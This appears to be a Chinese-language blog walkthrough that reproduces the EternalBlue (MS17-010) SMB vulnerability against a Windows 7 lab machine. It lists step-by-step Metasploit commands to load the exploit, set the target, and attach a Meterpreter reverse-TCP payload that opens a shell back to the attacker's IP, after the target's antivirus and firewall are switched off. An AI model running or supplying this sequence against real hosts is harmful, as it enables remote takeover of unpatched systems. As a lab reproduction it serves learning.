懵逼吗,突然复现一个上古的漏洞。没办法,今天忙着给站加功能了,只能水一篇了。再加上在某“大黑客群”发现一个还在耍这个洞的“大哥”。特此水下此文。

0x01 实验环境
攻击机:kali linux

ip:192.168.75.129

目标机:windows 7

ip:192.168.75.133

为了确保复现成功,先把360大爷和防火墙大哥关掉先

然后看看445小老弟是不是在村门口了

0x02 配置exploit

老规矩,先进msfconsole


msf > use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) > set rhost 192.168.75.133
rhost => 192.168.75.133

查看选项

msf exploit(ms17_010_eternalblue) > show options

设置目标机的IP,其他选项默认就可以;

注意:选项中说明了此exploit对应的目标系统,所以并不是具有该漏洞的系统都能利用此exploit;

0x03 配置payload
payload只需要配置监听返回会话的IP;

msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 192.168.75.129
lhost => 192.168.75.129

0x04 开始攻击
警告:攻击过程可能导致目标系统宕机重启,谨慎操作!

msf exploit(ms17_010_eternalblue) > exploit

成功获得session。
shell 进入主机操作

分类: CVE

天渊应龙圣神大帝-道锋潜鳞

天渊应龙圣神大帝-道锋潜鳞

以凡人之躯,承载天之道义

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注